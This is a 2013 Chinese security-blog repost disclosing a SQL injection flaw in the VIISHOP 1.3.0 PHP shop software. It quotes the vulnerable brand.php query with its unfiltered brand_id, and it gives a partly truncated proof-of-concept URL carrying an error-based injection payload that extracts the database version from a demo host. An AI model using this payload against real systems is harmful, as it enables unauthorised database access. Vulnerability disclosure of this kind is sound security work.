/*******************************************************//* VIISHOP 1.3.0 SQL Injection Vulnerability/* ======================== /* By: : Kn1f3 /* E-Mail : 681796@qq.com/*******************************************************//* Welcome to http://www.90sec.com *//*******************************************************///index.php 首页文件//index.php 首页文件$GVIISHOP 1.3.0 SQL注入及修复_记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华黑客技术" />
记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

VIISHOP 1.3.0 SQL注入及修复

2013-05-24 15:11
php;">
/*******************************************************/

/* VIISHOP 1.3.0 SQL Injection Vulnerability

/* ========================

/* By: : Kn1f3

/* E-Mail : 681796@qq.com

/*******************************************************/

/* Welcome to http://www.90sec.com */

/*******************************************************/

//index.php 首页文件


//index.php 首页文件
$GLOBALS['_REQUEST'] = isset( $_REQUEST ) ? $_REQUEST : "";
define( "BASEDIR", dirname( __FILE__ ) );
include_once( BASEDIR."/config/db_config.php" );
include_once( BASEDIR."/include/common.inc.php" );
if ( !isset( $_REQUEST['p'] ) )
{
                                $GLOBALS['_REQUEST']['p'] = "index";
}
$inc = str_replace( array( ":", "/", "..", ".", ";", "\\", "http", "ftp" ), "", $_REQUEST['p'] );
$inc = eregi_replace( "[^_a-zA-Z0-9]", "", $inc );
if ( !include( "system/{$inc}.php" ) )  //包含 进行了过滤 查看system目录下文件
{
                                show_msg( "error_once", "index.php" );
}



问题出在brand.php文件中


$brand_list = $db->fetch_array( $db->query( "SELECT * FROM {$prefix}brand WHERE uid = '{$brand_id}'" ) ); //$prefix 和 $brand_id 未初始化没有进行任何过滤就带入查询了



poc: http://demo.viishop.com/index.ph ... 28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28select%20version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29

 



 
修复方案:

推荐80sec 的防注入代码 哈哈哈哈 
 

知识来源: www.2cto.com/Article/201305/214057.html

阅读:92576 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“VIISHOP 1.3.0 SQL注入及修复”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云